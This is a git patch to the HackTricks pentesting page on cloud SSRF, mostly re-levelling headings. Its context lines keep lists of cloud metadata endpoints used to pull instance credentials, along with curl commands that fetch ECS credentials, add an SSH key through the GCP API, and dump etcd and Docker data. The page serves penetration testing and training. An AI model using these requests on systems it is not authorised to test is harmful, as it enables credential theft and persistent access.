From ff681fc8fc29a89b1442f014ab9f1293893a911e Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 2 May 2022 18:53:13 +0000 Subject: [PATCH] GitBook: [#3174] No subject --- .../cloud-ssrf.md | 44 +++++++++---------- 1 file changed, 21 insertions(+), 23 deletions(-) diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 48148d8f..5bff964e 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -1,4 +1,4 @@ - +# Cloud SSRF
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## AWS -# AWS +### Abusing SSRF in AWS EC2 environment -## Abusing SSRF in AWS EC2 environment - -### 169.254.169.254 - Metadata Address +#### 169.254.169.254 - Metadata Address **Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)). @@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http:// [**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges -## SSRF in AWS ECS (Container Service) credentials +### SSRF in AWS ECS (Container Service) credentials **ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**. @@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O - ``` -## SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. @@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -# GCP +## GCP -## SSRF URL for Google Cloud +You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). + +### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: @@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` -## Add an SSH key +### Add an SSH key Extract the token @@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' ``` -# Digital Ocean +## Digital Ocean Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/) @@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -# Packetcloud +## Packetcloud Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) -# Azure +## Azure Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/) @@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text ``` -# OpenStack/RackSpace +## OpenStack/RackSpace (header required? unknown) @@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu http://169.254.169.254/openstack ``` -# HP Helion +## HP Helion (header required? unknown) @@ -271,7 +272,7 @@ http://169.254.169.254/openstack http://169.254.169.254/2009-04-04/meta-data/ ``` -# Oracle Cloud +## Oracle Cloud ``` http://192.0.0.192/latest/ @@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/ http://192.0.0.192/latest/attributes/ ``` -# Alibaba +## Alibaba ``` http://100.100.100.200/latest/meta-data/ @@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/image-id ``` -# Kubernetes ETCD +## Kubernetes ETCD Can contain API keys and internal ip and ports @@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version curl http://127.0.0.1:2379/v2/keys/?recursive=true ``` -# Docker +## Docker ``` http://127.0.0.1:2375/v1.24/containers/jsonSimple example @@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` -# Rancher +## Rancher ``` curl http://rancher-metadata// ``` -
Support HackTricks and get benefits! @@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -